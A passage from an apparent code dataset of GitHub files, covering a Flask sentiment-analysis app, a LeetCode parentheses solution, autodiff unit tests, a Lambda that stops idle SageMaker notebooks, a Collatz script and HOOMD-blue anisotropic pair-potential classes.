nlp.pos_tag(token[begin - 1])[0][1] in ['NN', 'NNS', 'NNP', 'NNPS','JJ', 'JJR', 'JJS'] and \\\n nlp.pos_tag(token[end - 1])[0][1] in ['JJ', 'JJR', 'JJS','NN', 'NNS', 'NNP', 'NNPS']:\n if nlp.pos_tag(token[begin - 1])[0][1] in ['JJ', 'JJR', 'JJS'] and nlp.pos_tag(token[end - 1])[0][1] in ['NN', 'NNS', 'NNP', 'NNPS']:\n entity1 = token[end - 1]\n op = token[begin - 1]\n else:\n entity1 = token[begin - 1]\n op = token[end - 1]\n entity2 = wptoken.tokenize(entity1)[0]\n entity2 = entity2.strip()\n if op.lower() in ['true', 'right']:\n judges = 'good'\n if op.lower() in ['false', 'wrong']:\n judges = 'bad'\n if len(entity2) > 1:\n count_wp += 1\n\n if entity2 + '\\t' + op not in op_dict.keys():\n good_num, bad_num = 0, 0\n if judges == 'good':\n good_num = 1\n else:\n bad_num = 1\n op_dict[entity2 + '\\t' + op] = judges + '\\t' + '1' + '\\t' + '0' + '\\t' + str(\n good_num) + '\\t' + str(\n bad_num)\n\n else:\n ac_judges, count_tr, conf, good_num, bad_num = op_dict[entity2 + '\\t' + op].split('\\t')\n count_tr = int(count_tr) + 1\n if judges == 'good':\n good_num = int(good_num) + 1\n if judges == 'bad':\n bad_num = int(bad_num) + 1\n # 判断是否有冲突\n if conf == '1' or judges != ac_judges:\n op_dict[entity2 + '\\t' + op] = judges + '\\t' + str(count_tr) + '\\t' + '1' + '\\t' + str(\n good_num) + '\\t' + str(bad_num)\n else:\n op_dict[entity2 + '\\t' + op] = judges + '\\t' + str(count_tr) + '\\t' + '0' + '\\t' + str(\n good_num) + '\\t' + str(bad_num)\n # 遍历op_dict,放入到list中去\n messages = []\n for key in op_dict.keys():\n message=[]\n k1,k2=key.split('\\t')\n message.append(k1)\n message.append(k2)\n v1,v2,v3,v4,v5=op_dict[key].split('\\t')\n if v1=='good':\n v1='positive'\n if v1=='bad':\n v1='negative'\n message.append(v1)\n v2=v2+' time(s)'\n if v3=='0':\n v3='no conflicts'\n if v3=='1':\n v3='conflicted knowledge'\n v4=v4+' vote(s)'\n v5=v5+' vote(s)'\n message.append(v2)\n message.append(v3)\n message.append(v4)\n message.append(v5)\n messages.append(message)\n # datalist = []\n # con = sqlite3.connect(\"moveTop.db\") # 打开数据库\n # cur = con.cursor() # 获取游标\n # sql = \"select * from movieTop250\" # sql查询语句\n # data = cur.execute(sql) # 获取数据\n # for item in data: # 将数据保存在列表中\n # datalist.append(item)\n # cur.close() # 关闭游标\n # con.close() # 关闭连接\n return render_template(\"movie.html\", movies=messages)\n\n# 返回评分界面\n@app.route('/score')\ndef score():\n messages=[]\n with open(r'./kgs/movie.spo','r',encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n i1,i2,i3,i4,i5,i6,i7,i8=line.split('\\t')\n if i3 == 'good':\n i3 = 'positive'\n if i3 == 'bad':\n i3 = 'negative'\n i4 = i4 + ' time(s)'\n if i5 == '0':\n i5 = 'no conflicts'\n if i5 == '1':\n i5 = 'conflicted knowledge'\n i6 = i6 + ' vote(s)'\n i7 = i7 + ' vote(s)'\n if i8[0]!='-':\n i8=i8[0:3]\n else:\n i8=i8[0:4]\n message=[]\n message.append(i1)\n message.append(i2)\n message.append(i3)\n message.append(i4)\n message.append(i5)\n message.append(i6)\n message.append(i7)\n message.append(i8)\n messages.append(message)\n return render_template(\"score.html\",movies=messages)\n\n\n@app.route('/word')\ndef word():\n return render_template(\"word.html\")\n\n\n# 返回词云界面\n@app.route('/wordsdeal', methods=['POST'])\ndef words_deal():\n input_text = request.form['input_text']\n score = get_sentiment(input_text)\n pol = ''\n if score>=0:\n pol = pol + 'positive'\n else:\n pol = pol + 'negative'\n final_str = \"该句子的情感极性为:\"+pol+\" ,句子情感得分为:\"+str(score)\n return jsonify({'processed_text': final_str})\n\ndef get_sentiment(text):\n sia = 
SentimentIntensityAnalyzer()\n sentiment_score = sia.polarity_scores(text)\n sentiment_polarity = sentiment_score['compound']\n return sentiment_polarity\n\n\n# 返回团队界面\n@app.route('/team')\ndef team():\n return render_template(\"team.html\")\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"AlanLinZhizhou/analyzeText","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35160813578","text":"# 56ms 50.37%\n# 13.1MB 72.31%\nclass Solution:\n\n def longestValidParentheses(self, s: str) -> int:\n\n dp = []\n ans = 0\n for i in range(len(s)):\n if i == 0:\n dp.append(0)\n continue\n if s[i] == '(':\n dp.append(0)\n else:\n if s[i-1] == '(':\n dp.append(dp[i-2]+2)\n elif i-dp[i-1]-1 >= 0 and s[i-dp[i-1]-1] == '(':\n dp.append(dp[i-1]+dp[max(i-dp[i-1]-2, 0)]+2)\n else:\n dp.append(0)\n if dp[-1] > ans:\n ans = dp[-1]\n return ans\n\nst = '()(())'\na = Solution()\nprint(a.longestValidParentheses(st))","repo_name":"hjf1997/Leetcode","sub_path":"String/longest-valid-parentheses.py","file_name":"longest-valid-parentheses.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12745969127","text":"import unittest\nfrom Autodiff.computation_graph import *\n\n\nclass GraphTest(unittest.TestCase):\n\n def setUp(self) -> None:\n v5 = Node(op=Minus())\n v4 = Node(op=Plus())\n v3 = Node(op=Sin())\n v2 = Node(op=Product())\n v1 = Node(op=Log())\n v0 = Node(op=Assignment(52))\n v_1 = Node(op=Assignment(21.3))\n\n v5.add_input(v4)\n v5.add_input(v3)\n\n v4.add_input(v1)\n v4.add_input(v2)\n\n v3.add_input(v0)\n\n v2.add_input(v_1)\n v2.add_input(v0)\n\n v1.add_input(v_1)\n self.nodes = [v_1, v0, v1, v2, v3, v4, v5]\n\n def test_evaluation(self):\n graph = Graph()\n graph.execute(self.nodes[-1])\n inputs = [self.nodes[0].value, self.nodes[1].value]\n\n self.ref_func = lambda x1, x2: np.log(x1) + x1 * x2 - np.sin(x2)\n self.assertAlmostEqual(self.nodes[-1].value, self.ref_func(*inputs))\n\n def test_gradient(self):\n graph = Graph()\n # derivation with respect to v_1\n graph.forward_gradient(self.nodes[-1], self.nodes[0])\n inputs = [self.nodes[0].value, self.nodes[1].value]\n\n self.ref_func = lambda x1, x2: np.log(x1) + x1 * x2 - np.sin(x2)\n self.grad1 = lambda x1, x2: 1 / x1 + x2\n\n self.assertAlmostEqual(self.nodes[-1].value, self.ref_func(*inputs))\n self.assertAlmostEqual(self.nodes[-1].grad, self.grad1(*inputs))\n\n # derivation with respect to v0\n graph.forward_gradient(self.nodes[-1], self.nodes[1])\n self.grad2 = lambda x1, x2: x1 - np.cos(x2)\n self.assertAlmostEqual(self.nodes[-1].value, self.ref_func(*inputs))\n self.assertAlmostEqual(self.nodes[-1].grad, self.grad2(*inputs))\n\n def test_reverse_gradient(self):\n # reverse mode\n graph = Graph()\n graph.reverse_gradient(self.nodes[-1])\n\n inputs = [self.nodes[0].value, self.nodes[1].value]\n\n self.ref_func = lambda x1, x2: np.log(x1) + x1 * x2 - np.sin(x2)\n self.grad1 = lambda x1, x2: 1 / x1 + x2\n self.assertAlmostEqual(self.nodes[0].adjoint, self.grad1(*inputs))\n\n # derivation with respect to v0\n\n self.grad2 = lambda x1, x2: x1 - np.cos(x2)\n self.assertAlmostEqual(self.nodes[1].adjoint, 
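The longest-valid-parentheses record above fills `dp[i]` with the length of the longest valid substring ending at index `i`: a `)` that closes an adjacent `(` extends `dp[i-2]` by two, while a `)` that closes a `(` sitting just before a valid run adds `dp[i-1] + 2` plus whatever valid run precedes that `(`. An equivalent compact sketch of the same recurrence:

```python
# dp[i] = length of the longest valid substring ending at i.
def longest_valid_parentheses(s: str) -> int:
    dp = [0] * len(s)
    best = 0
    for i in range(1, len(s)):
        if s[i] == ')':
            if s[i - 1] == '(':
                # "...()": extend whatever ended before the pair.
                dp[i] = (dp[i - 2] if i >= 2 else 0) + 2
            elif i - dp[i - 1] - 1 >= 0 and s[i - dp[i - 1] - 1] == '(':
                # "...((...))": jump over the inner valid run.
                dp[i] = dp[i - 1] + 2 + (dp[i - dp[i - 1] - 2] if i - dp[i - 1] - 2 >= 0 else 0)
            best = max(best, dp[i])
    return best

assert longest_valid_parentheses('()(())') == 6
```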
self.grad2(*inputs))\n","repo_name":"maxime-z/basic_sc","sub_path":"Autodiff/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27341513600","text":"import boto3\nimport requests\nfrom datetime import datetime, timezone\nimport structlog\n\nMAX_IDLE_SIZE = 30 # in minutes\n\nstructlog.configure(\n processors=[\n structlog.processors.JSONRenderer(sort_keys=True),\n structlog.stdlib.add_log_level,\n structlog.stdlib.PositionalArgumentsFormatter(),\n structlog.processors.TimeStamper(fmt='iso'),\n ],\n logger_factory=structlog.stdlib.LoggerFactory(),\n wrapper_class=structlog.stdlib.BoundLogger,\n context_class=structlog.threadlocal.wrap_dict(dict),\n)\n\n\ndef lambda_handler(event, context):\n\n log = structlog.get_logger()\n\n sagemaker = boto3.client('sagemaker')\n notebooks = sagemaker.list_notebook_instances(\n StatusEquals='InService')['NotebookInstances']\n\n for notebook in notebooks:\n\n response = sagemaker.create_presigned_notebook_instance_url(\n NotebookInstanceName=notebook['NotebookInstanceName'],\n SessionExpirationDurationInSeconds=600\n )\n url = response['AuthorizedUrl']\n\n response = requests.get(f'{url}/api/kernels')\n\n # check if any of the kernels have been active recently\n for kernel in response.json():\n\n if kernel['execution_state'] == 'busy':\n continue\n\n last_activity_time_str = kernel['last_activity']\n last_activity_time = datetime.strptime(\n last_activity_time_str, '%Y-%m-%dT%H:%M:%S.%fZ').replace(tzinfo=timezone.utc)\n current_time = datetime.now(timezone.utc)\n time_elapsed = (\n current_time - last_activity_time).total_seconds() // 60 # in minutes\n\n if time_elapsed > MAX_IDLE_SIZE:\n sagemaker.stop_notebook_instance(\n NotebookInstanceName=notebook['NotebookInstanceName'])\n log.warning(\n 'Stopped SageMaker notebook instance due to inactivity',\n instance_name=notebook['NotebookInstanceName'],\n kernel_id=kernel['id'],\n last_activity_time=last_activity_time_str,\n time_elapsed_minutes=time_elapsed,\n )\n break\n else:\n log.info(\n 'SageMaker notebook instance is still active',\n instance_name=notebook['NotebookInstanceName'],\n )\n","repo_name":"vanbrands/sagemaker_auto_sleep","sub_path":"src/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38659726164","text":"# found thes solution using the last number here... https://oeis.org/A006877,\n# to improve, I would store the sequence length for each number and use that if the program ever encountered it again\n\ndef func(n):\n if n & 1 == 0:\n n = n/2\n else:\n n = 3*n + 1\n return n\n\n\ni_max = 0\nfor n in range(150, 200):\n i = 0\n while n != 1:\n n = func(n)\n i = i + 1\n if i > i_max:\n i_max = i\n\nprint(i_max)\n","repo_name":"acjensen/project-euler","sub_path":"0014_LongestCollatzSequence.py","file_name":"0014_LongestCollatzSequence.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29680242641","text":"r\"\"\"Anisotropic pair forces.\n\nAnisotropic pair force classes apply a force, torque, and virial on every\nparticle in the simulation state commensurate with the potential energy:\n\n.. 
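The Collatz record above notes in its header comment that storing the sequence length for each number would speed up the search. A hedged sketch of exactly that improvement using memoization (recursion depth is fine for this small range; an iterative cache would be safer for very large inputs):

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def collatz_len(n: int) -> int:
    # Number of steps to reach 1; cached so shared tails are computed once.
    if n == 1:
        return 0
    nxt = n // 2 if n % 2 == 0 else 3 * n + 1
    return 1 + collatz_len(nxt)

# Same search as the record's loop over range(150, 200), now with reuse.
print(max(collatz_len(n) for n in range(150, 200)))  # longest chain length
```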
math::\n\n U_\\mathrm{pair,total} = \\frac{1}{2} \\sum_{i=0}^\\mathrm{N_particles-1}\n \\sum_{j \\ne i, (i,j) \\notin \\mathrm{exclusions}}\n U_\\mathrm{pair}(r_{ij}, \\mathbf{q}_i, \\mathbf{q}_j)\n\n`AnisotropicPair` applies cuttoffs, exclusions, and assigns per particle\nenergies and virials in the same manner as `hoomd.md.pair.Pair`\n\n`AnisotropicPair` does not support the ``'xplor'`` shifting mode or the ``r_on``\nparameter.\n\"\"\"\n\nfrom collections.abc import Sequence\nimport json\nfrom numbers import Number\n\nfrom hoomd.md.pair.pair import Pair\nfrom hoomd.logging import log\nfrom hoomd.data.parameterdicts import TypeParameterDict\nfrom hoomd.data.typeparam import TypeParameter\nfrom hoomd.data.typeconverter import OnlyIf, to_type_converter\n\n\nclass AnisotropicPair(Pair):\n r\"\"\"Base class anisotropic pair force.\n\n `AnisotropicPair` is the base class for all anisotropic pair forces.\n\n Warning:\n This class should not be instantiated by users. The class can be used\n for `isinstance` or `issubclass` checks.\n\n Args:\n nlist (hoomd.md.nlist.NeighborList) : The neighbor list.\n default_r_cut (`float`, optional) : The default cutoff for the\n potential, defaults to ``None`` which means no cutoff\n :math:`[\\mathrm{length}]`.\n mode (`str`, optional) : the energy shifting mode, defaults to \"none\".\n \"\"\"\n\n _accepted_modes = (\"none\", \"shift\")\n\n def __init__(self, nlist, default_r_cut=None, mode=\"none\"):\n super().__init__(nlist, default_r_cut, 0.0, mode)\n\n def _return_type_shapes(self):\n type_shapes = self._cpp_obj.getTypeShapesPy()\n ret = [json.loads(json_string) for json_string in type_shapes]\n return ret\n\n\nclass Dipole(AnisotropicPair):\n r\"\"\"Screened dipole-dipole pair forces.\n\n Args:\n nlist (hoomd.md.nlist.NeighborList): Neighbor list\n default_r_cut (float): Default cutoff radius :math:`[\\mathrm{length}]`.\n\n `Dipole` computes the (screened) interaction between pairs of\n particles with dipoles and electrostatic charges:\n\n .. math::\n\n U &= U_{dd} + U_{de} + U_{ee}\n\n U_{dd} &= A e^{-\\kappa r}\n \\left(\\frac{\\vec{\\mu_i}\\cdot\\vec{\\mu_j}}{r^3}\n - 3\\frac{(\\vec{\\mu_i}\\cdot \\vec{r_{ji}})\n (\\vec{\\mu_j}\\cdot \\vec{r_{ji}})}\n {r^5}\n \\right)\n\n U_{de} &= A e^{-\\kappa r}\n \\left(\\frac{(\\vec{\\mu_j}\\cdot \\vec{r_{ji}})q_i}{r^3}\n - \\frac{(\\vec{\\mu_i}\\cdot \\vec{r_{ji}})q_j}{r^3}\n \\right)\n\n U_{ee} &= A e^{-\\kappa r} \\frac{q_i q_j}{r}\n\n Note:\n All units are documented electronic dipole moments. However, `Dipole`\n can also be used to represent magnetic dipoles.\n\n Example::\n\n nl = nlist.Cell()\n dipole = md.pair.ansio.Dipole(nl, default_r_cut=3.0)\n dipole.params[('A', 'B')] = dict(A=1.0, kappa=4.0)\n dipole.mu['A'] = (4.0, 1.0, 0.0)\n\n .. py:attribute:: params\n\n The dipole potential parameters. The dictionary has the following\n keys:\n\n * ``A`` (`float`, **required**) - :math:`A` - electrostatic energy\n scale (*default*: 1.0)\n :math:`[\\mathrm{energy} \\cdot \\mathrm{length} \\cdot\n \\mathrm{charge}^{-2}]`\n * ``kappa`` (`float`, **required**) - :math:`\\kappa` - inverse\n screening length :math:`[\\mathrm{length}^{-1}]`\n\n Type: `TypeParameter` [`tuple` [``particle_type``, ``particle_type``],\n `dict`]\n\n .. py:attribute:: mu\n\n :math:`\\mu` - the magnetic magnitude of the particle local reference\n frame as a tuple (i.e. 
:math:`(\\mu_x, \\mu_y, \\mu_z)`)\n :math:`[\\mathrm{charge} \\cdot \\mathrm{length}]`.\n\n Type: `TypeParameter` [``particle_type``, `tuple` [`float`, `float`,\n `float` ]]\n \"\"\"\n _cpp_class_name = \"AnisoPotentialPairDipole\"\n\n def __init__(self, nlist, default_r_cut=None):\n super().__init__(nlist, default_r_cut, 'none')\n params = TypeParameter(\n 'params', 'particle_types',\n TypeParameterDict(A=float, kappa=float, len_keys=2))\n mu = TypeParameter('mu', 'particle_types',\n TypeParameterDict((float, float, float), len_keys=1))\n self._extend_typeparam((params, mu))\n\n\nclass GayBerne(AnisotropicPair):\n r\"\"\"Gay-Berne anisotropic pair force.\n\n Args:\n nlist (hoomd.md.nlist.NeighborList): Neighbor list\n default_r_cut (float): Default cutoff radius :math:`[\\mathrm{length}]`.\n mode (str): energy shifting/smoothing mode.\n\n `GayBerne` computes the Gay-Berne anisotropic pair force on every particle\n in the simulation state. This version of the Gay-Berne force supports\n identical pairs of uniaxial ellipsoids, with orientation-independent\n energy-well depth. The potential comes from the following paper `Allen et.\n al. 2006`_.\n\n .. _Allen et. al. 2006: http://dx.doi.org/10.1080/00268970601075238\n\n .. math::\n U(\\vec r, \\vec e_i, \\vec e_j) =\n \\begin{cases}\n 4 \\varepsilon \\left[ \\zeta^{-12} - \\zeta^{-6} \\right]\n & \\zeta < \\zeta_{\\mathrm{cut}} \\\\\n 0 & \\zeta \\ge \\zeta_{\\mathrm{cut}} \\\\\n \\end{cases}\n\n where\n\n .. math::\n\n \\zeta &= \\left(\\frac{r-\\sigma+\\sigma_{\\mathrm{min}}}\n {\\sigma_{\\mathrm{min}}}\\right),\n\n \\sigma^{-2} &= \\frac{1}{2} \\hat{\\vec{r}}\n \\cdot \\vec{H^{-1}} \\cdot \\hat{\\vec{r}},\n\n \\vec{H} &= 2 \\ell_\\perp^2 \\vec{1}\n + (\\ell_\\parallel^2 - \\ell_\\perp^2)\n (\\vec{e_i} \\otimes \\vec{e_i} + \\vec{e_j} \\otimes \\vec{e_j}),\n\n and :math:`\\sigma_{\\mathrm{min}} = 2 \\min(\\ell_\\perp, \\ell_\\parallel)`.\n\n The cut-off parameter :math:`r_{\\mathrm{cut}}` is defined for two particles\n oriented parallel along the **long** axis, i.e.\n :math:`\\zeta_{\\mathrm{cut}} = \\left(\\frac{r-\\sigma_{\\mathrm{max}}\n + \\sigma_{\\mathrm{min}}}{\\sigma_{\\mathrm{min}}}\\right)`\n where :math:`\\sigma_{\\mathrm{max}} = 2 \\max(\\ell_\\perp, \\ell_\\parallel)` .\n\n The quantities :math:`\\ell_\\parallel` and :math:`\\ell_\\perp` denote the\n semi-axis lengths parallel and perpendicular to particle orientation.\n\n Example::\n\n nl = nlist.Cell()\n gay_berne = md.pair.aniso.GayBerne(nlist=nl, default_r_cut=2.5)\n gay_berne.params[('A', 'A')] = dict(epsilon=1.0, lperp=0.45, lpar=0.5)\n gay_berne.r_cut[('A', 'B')] = 2 ** (1.0 / 6.0)\n\n .. py:attribute:: params\n\n The Gay-Berne potential parameters. 
The dictionary has the following\n keys:\n\n * ``epsilon`` (`float`, **required**) - :math:`\\varepsilon`\n :math:`[\\mathrm{energy}]`\n * ``lperp`` (`float`, **required**) - :math:`\\ell_\\perp`\n :math:`[\\mathrm{length}]`\n * ``lpar`` (`float`, **required**) - :math:`\\ell_\\parallel`\n :math:`[\\mathrm{length}]`\n\n Type: `TypeParameter` [`tuple` [``particle_type``, ``particle_type``],\n `dict`]\n \"\"\"\n _cpp_class_name = \"AnisoPotentialPairGB\"\n\n def __init__(self, nlist, default_r_cut=None, mode='none'):\n super().__init__(nlist, default_r_cut, mode)\n params = TypeParameter(\n 'params', 'particle_types',\n TypeParameterDict(epsilon=float,\n lperp=float,\n lpar=float,\n len_keys=2))\n self._add_typeparam(params)\n\n @log(category=\"object\")\n def type_shapes(self):\n \"\"\"Get all the types of shapes in the current simulation.\n\n Example:\n\n >>> gay_berne.type_shapes\n [{'type': 'Ellipsoid', 'a': 1.0, 'b': 1.0, 'c': 1.5}]\n\n Returns:\n A list of dictionaries, one for each particle type in the system.\n \"\"\"\n return super()._return_type_shapes()\n\n\nclass ALJ(AnisotropicPair):\n r\"\"\"Anistropic LJ force.\n\n Args:\n nlist (hoomd.md.nlist.NeighborList): Neighbor list\n default_r_cut (float): Default cutoff radius :math:`[length]`.\n\n `ALJ` computes the Lennard-Jones force between anisotropic particles as\n described in `Ramasubramani, V. et al. 2020`_, using the formula:\n\n .. _Ramasubramani, V. et al. 2020: https://doi.org/10.1063/5.0019735\n\n .. math::\n\n U(r, r_c) = U_0(r) + U_c(r_c)\n\n The first term is the central interaction :math:`U_0`, the standard\n center-center interaction between two Lennard-Jones particles with\n center-center distance :math:`r`. The second term is the contact interaction\n :math:`U_c`, computed from the smallest distance between the surfaces of the\n two shapes :math:`r_c`. The central and contact interactions are defined as\n follows:\n\n .. math::\n\n &U_0(r) = 4 \\varepsilon \\left[ \\left( \\frac{\\sigma}{r} \\right)^{12} -\n \\left( \\frac{\\sigma}{r} \\right)^{6} \\right]\n\n &U_c(r_c) = 4 \\varepsilon_c(\\varepsilon) \\left[ \\left(\n \\frac{\\sigma_c}{r_c} \\right)^{12} - \\left( \\frac{\\sigma_c}{r_c}\n \\right)^{6} \\right]\n\n where :math:`\\varepsilon` (`epsilon `) affects strength of both the\n central and contact interactions, :math:`\\varepsilon_c` is an energy\n coefficient set proportional to :math:`\\varepsilon` to preserve the shape,\n :math:`\\sigma` is the interaction distance of the central term computed as\n the average of :math:`\\sigma_i` (`sigma_i `) and :math:`\\sigma_j`\n (`sigma_j `). Lastly, `ALJ` uses the contact ratios :math:`\\beta_i`\n (`contact_ratio_i `) and :math:`\\beta_j` (`contact_ratio_j\n `) to compute the contact sigma :math:`\\sigma_c` as follows:\n\n .. math::\n\n \\sigma_c &= \\frac{1}{2} \\left[\\sigma_{ci} + \\sigma_{cj} \\right]\n\n \\sigma_{ci} &= \\beta_i \\cdot \\sigma_i\n\n \\sigma_{cj} &= \\beta_j \\cdot \\sigma_j\n\n The total potential energy is therefore the sum of two interactions, a\n central Lennard-Jones potential and a radially-shifted Lennard-Jones\n potential where the shift is anisotropic and depends on the extent of the\n shape in each direction.\n\n Each term has an independent cutoff at which the energy is set to zero.\n The behavior of these cutoffs is dependent on whether a user requires LJ\n or Weeks-Chandler-Anderson (WCA)-like (repulsive-only) behavior. This\n behavior is controlled using the `alpha ` parameter, which can\n take on the following values:\n\n .. 
list-table:: Set alpha based on range of the center-center and\n contact-contact interactions.\n :header-rows: 1\n :stub-columns: 1\n\n * -\n - center-center repulsive only\n - center-center full-range\n * - contact-contact repulsive only\n - alpha = 0\n - alpha = 1\n * - contact-contact full-range\n - alpha = 2\n - alpha = 3\n\n For polytopes, computing interactions using a single contact point leads to\n significant instabilities in the torques because the contact point can jump\n from one end of a face to another in an arbitrarily small time interval. To\n ameliorate this, the ALJ potential performs a local averaging over all the\n features associated with the closest simplices on two polytopes. This\n averaging can be turned off by setting the ``average_simplices`` key for the\n type pair to ``False``.\n\n Specifying only ``rounding_radii`` creates an ellipsoid, while specifying\n only ``vertices`` creates a convex polytope (set ``vertices`` and ``faces``\n to empty lists to create the ellipsoid).\n\n Important:\n The repulsive part of the contact interaction :math:`U_c(r_c)` prevents\n two `ALJ` particles from approaching closely, effectively rounding the\n shape by a radius :math:`\\sigma_c`. For this reason, the shape written\n by `type_shapes` includes the rounding due to `rounding_radii `\n and that due to :math:`\\sigma_c`.\n\n .. rubric:: Choosing `r_cut `:\n\n Set `r_cut ` for each pair of particle types so\n that `ALJ` can compute interactions for all possible relative placements\n and orientations of the particles. The farthest apart two particles can be\n while still interacting depends on the value of ``alpha``.\n\n In the following list, the first argument to the :math:`\\max` function is\n for the center-center interaction. The second argument is for the\n contact-contact interaction, where :math:`R_i` is the radius of the\n shape's minimal origin-centered bounding sphere of the particle with type\n :math:`i`.\n\n Let :math:`\\lambda_{min} = 2^{1/6}` be the position of the potential energy\n minimum of the Lennard-Jones potential and\n :math:`\\lambda_{cut}^{attractive}` be a larger value, such as 2.5 (typically\n used in isotropic LJ systems).\n\n * For alpha=0:\n\n .. math::\n\n r_{\\mathrm{cut},ij} = \\max \\bigg( & \\frac{\\lambda_{min}}{2}\n (\\sigma_i + \\sigma_j), \\\\\n & R_i + R_j + R_{\\mathrm{rounding},i} +\n R_{\\mathrm{rounding},j} + \\frac{\\lambda_{min}}{2}\n (\\beta_i \\cdot \\sigma_i + \\beta_j \\cdot \\sigma_j) \\bigg)\n\n * For alpha=1:\n\n .. math::\n\n r_{\\mathrm{cut},ij} =\n \\max \\bigg( & \\frac{\\lambda_{cut}^{attractive}}{2}\n (\\sigma_i + \\sigma_j), \\\\\n & R_i + R_j + R_{\\mathrm{rounding},i} +\n R_{\\mathrm{rounding},j}+ \\frac{\\lambda_{min}}{2}\n (\\beta_i \\cdot \\sigma_i + \\beta_j \\cdot \\sigma_j) \\bigg)\n\n * For alpha=2:\n\n .. math::\n\n r_{\\mathrm{cut},ij} = \\max \\bigg( & \\frac{\\lambda_{min}}{2}\n (\\sigma_i + \\sigma_j)), \\\\\n & R_i + R_j + R_{\\mathrm{rounding},i} +\n R_{\\mathrm{rounding},j} + \\frac{\\lambda_{cut}^{attractive}}{2}\n (\\beta_i \\cdot \\sigma_i + \\beta_j \\cdot \\sigma_j) \\bigg)\n\n * For alpha=3:\n\n .. 
math::\n\n r_{\\mathrm{cut},ij} =\n \\max \\bigg( & \\frac{\\lambda_{cut}^{attractive}}{2}\n (\\sigma_i + \\sigma_j), \\\\\n & R_i + R_j + R_{\\mathrm{rounding},i} +\n R_{\\mathrm{rounding},j} + \\frac{\\lambda_{cut}^{attractive}}{2}\n (\\beta_i \\cdot \\sigma_i + \\beta_j \\cdot \\sigma_j) \\bigg)\n\n Warning:\n Changing dimension in a simulation will invalidate this force and will\n lead to error or unrealistic behavior.\n\n .. py:attribute:: params\n\n The ALJ potential parameters. The dictionary has the following keys:\n\n * ``epsilon`` (`float`, **required**) - base energy scale\n :math:`\\varepsilon` :math:`[energy]`.\n * ``sigma_i`` (`float`, **required**) - the insphere diameter of the\n first particle type, :math:`\\sigma_i` :math:`[length]`.\n * ``sigma_j`` (`float`, **required**) - the insphere diameter of the\n second particle type, :math:`\\sigma_j` :math:`[length]`.\n * ``alpha`` (`int`, **required**) - Integer 0-3 indicating whether or\n not to include the attractive component of the interaction (see\n above for details).\n * ``contact_ratio_i`` (`float`, **optional**) - :math:`\\beta_i`, the\n ratio of the contact sphere diameter of the first type with\n ``sigma_i``.\n Defaults to 0.15.\n * ``contact_ratio_j`` (`float`, **optional**) - :math:`\\beta_j`, the\n ratio of the contact sphere diameter of the second type with\n ``sigma_j``.\n Defaults to 0.15.\n * ``average_simplices`` (`bool`, **optional**) - Whether to average over\n simplices. Defaults to ``True``. See class documentation for more\n information.\n\n Type: `hoomd.data.typeparam.TypeParameter` [`tuple` [``particle_types``,\n ``particle_types``], `dict`]\n\n Note:\n While the evaluation of the potential is symmetric with respect to\n the potential parameter labels ``i`` and ``j``, the parameters which\n physically represent a specific particle type must appear in all sets\n of pair parameters which include that particle type.\n\n .. py:attribute:: shape\n\n The shape of a given type. The dictionary has the following keys per\n type:\n\n * ``vertices`` (`list` [`tuple` [`float`, `float`, `float`]],\n **required**) - The vertices of a convex polytope in 2 or 3\n dimensions. The third dimension in 2D is ignored.\n * ``rounding_radii`` (`tuple` [`float`, `float`, `float`] or `float`,\n **required**) - The semimajor axes of a rounding ellipsoid\n :math:`R_{\\mathrm{rounding},i}`. If a single value is specified, the\n rounding ellipsoid is a sphere. Defaults to (0.0, 0.0, 0.0).\n * ``faces`` (`list` [`list` [`int`]], **required**) - The faces of the\n polyhedron specified as a list of list of integers. 
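Every `r_cut` formula above depends on `R_i`, defined in the docstring as the radius of the shape's minimal origin-centered bounding sphere. For a convex polytope given by its vertices that radius is simply the largest vertex distance from the origin; a hedged NumPy helper (not part of HOOMD, names are illustrative):

```python
import numpy as np

def bounding_sphere_radius(vertices) -> float:
    # Largest Euclidean norm over all vertices = minimal origin-centered
    # bounding sphere radius for a convex polytope.
    return float(np.max(np.linalg.norm(np.asarray(vertices, dtype=float), axis=1)))

cube_verts = [(x, y, z) for x in (-0.5, 0.5)
                        for y in (-0.5, 0.5)
                        for z in (-0.5, 0.5)]
print(bounding_sphere_radius(cube_verts))  # sqrt(3)/2, approx. 0.866
```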
The indices\n corresponding to the vertices must be ordered counterclockwise with\n respect to the face normal vector pointing outward from the origin.\n\n Type: `hoomd.data.typeparam.TypeParameter` [``particle_types``, `dict`]\n\n Example::\n\n nl = hoomd.md.nlist.Cell(buffer=0.4)\n alj = hoomd.md.pair.aniso.ALJ(nl, r_cut=2.5)\n\n cube_verts = [(-0.5, -0.5, -0.5),\n (-0.5, -0.5, 0.5),\n (-0.5, 0.5, -0.5),\n (-0.5, 0.5, 0.5),\n (0.5, -0.5, -0.5),\n (0.5, -0.5, 0.5),\n (0.5, 0.5, -0.5),\n (0.5, 0.5, 0.5)];\n\n cube_faces = [[0, 2, 6],\n [6, 4, 0],\n [5, 0, 4],\n [5,1,0],\n [5,4,6],\n [5,6,7],\n [3,2,0],\n [3,0,1],\n [3,6,2],\n [3,7,6],\n [3,1,5],\n [3,5,7]]\n\n alj.params[(\"A\", \"A\")] = dict(epsilon=2.0,\n sigma_i=1.0,\n sigma_j=1.0,\n alpha=1,\n )\n alj.shape[\"A\"] = dict(vertices=cube_verts,\n faces=cube_faces)\n\n The following example shows how to easily get the faces, with vertex indices\n properly ordered, for a shape with known vertices by using the\n `coxeter `_ package:\n\n Example::\n\n import coxeter\n\n nl = hoomd.md.nlist.Cell(buffer=0.4)\n alj = hoomd.md.pair.aniso.ALJ(nl, r_cut=2.5)\n\n cube_verts = [[-0.5, -0.5, -0.5],\n [-0.5, -0.5, 0.5],\n [-0.5, 